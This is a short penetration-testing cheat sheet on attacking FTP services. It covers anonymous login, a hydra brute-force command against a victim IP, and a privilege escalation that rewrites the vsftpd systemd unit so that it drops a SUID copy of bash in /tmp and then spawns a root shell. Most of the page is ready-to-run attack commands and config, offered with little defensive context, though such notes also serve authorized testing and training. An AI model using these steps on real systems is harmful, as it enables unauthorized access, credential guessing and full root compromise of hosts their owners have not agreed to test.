# FTP

## Anonymous Login

Some installations of FTP will allow anonymous logins.

```
ftp <victim_ip> 
anonymous:anonymous
```

### Brute Force

If no max attempts or any similar system is in place, simply brute force it.

```
hydra -l admin -P wordlist.txt victim_ip -t 64 ftp
```

### Privilege Escalation - VSFTPD

If you can edit the vsftpd service file. You can get a root shell

Modify the service file to run the following commands:

```
cp /bin/bash /tmp/root_shell
chmod +xs /tmp/root_shell
```

These commands copy the `/bin/bash` to `/tmp/root_shell` and set the SUID bit on it, which would allow us to execute the binary as the owner i.e. root

Edit the `/lib/systemd/system/vsftpd.service` file to contain the following code:

```bash
[Unit]
Description=vsftpd FTP server
After=network.target

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'cp /bin/bash /tmp/root_shell; chmod +xs /tmp/root_shell'
#ExecReload=/bin/kill -HUP $MAINPID
#ExecStartPre=-/bin/mkdir -p /var/run/vsftpd/empty

[Install]
WantedBy=multi-user.target
```

Once the vsftpd.service file was modified, reload the daemon:

```
systemctl daemon-reload
```

This allowed us to run our modified service using

```
sudo /usr/sbin/service vsftpd restart
```

New file `root_shell should now be available` inside the `/tmp` directory

Use file to spawn a root shell.&#x20;

```
/tmp/root_shell -p
```